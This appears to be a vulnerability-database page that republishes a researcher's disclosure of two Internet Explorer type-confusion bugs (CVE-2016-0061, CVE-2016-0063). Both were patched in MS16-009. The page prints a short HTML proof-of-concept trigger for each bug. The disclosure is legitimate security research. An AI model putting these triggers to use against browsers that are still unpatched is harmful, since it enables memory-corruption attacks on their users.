Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2016-0061 CVE-2016-0063

Publish Date: 13 Feb 2016

Author: SkyLined

Source

                							

                Hello everyone,

I've recently released examples on twitter of how to trigger two
security vulnerabilities in Microsoft Internet Explorer. These issue
were discovered last year and reported to Microsoft through ZDI.
Microsoft release security updates to address these issues last Tuesday.

======

CVE-2016-0061:
https://twitter.com/berendjanwever/status/697819335574843394

MSHTML Form element id type confusion CVE-2016-0061 ZDI-16-162 MS16-009

&lt;meta http-equiv=X-UA-Compatible content=IE=7&gt;&lt;form id="&amp;#x4141;&amp;#x4141;"&gt;&lt;body onload=opener?opener["\u4141\u4141"]():open("?")&gt;

======

CVE-2016-0063:
https://twitter.com/berendjanwever/status/697818121835581441

DOMImplementation method type confusion CVE-2016-0063 ZDI-16-166 MS16-009 

&lt;body onload=open("2.html")&gt; (part 1/2)
&lt;meta http-equiv=X-UA-Compatible content=IE=11&gt;&lt;body onload=x=opener.DOMImplementation(0).prototype.isPrototypeOf;x()&gt; (part 2/2)

======

Both were found through fuzzing inspired by Michal Zalewski's cross_fuzz
http://lcamtuf.blogspot.nl/2011/01/announcing-crossfuzz-potential-0-day-in.html

Cheers,

SkyLined
<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Microsoft Internet Explorer Type Confusion

Vulmon Search

About

Products

Connect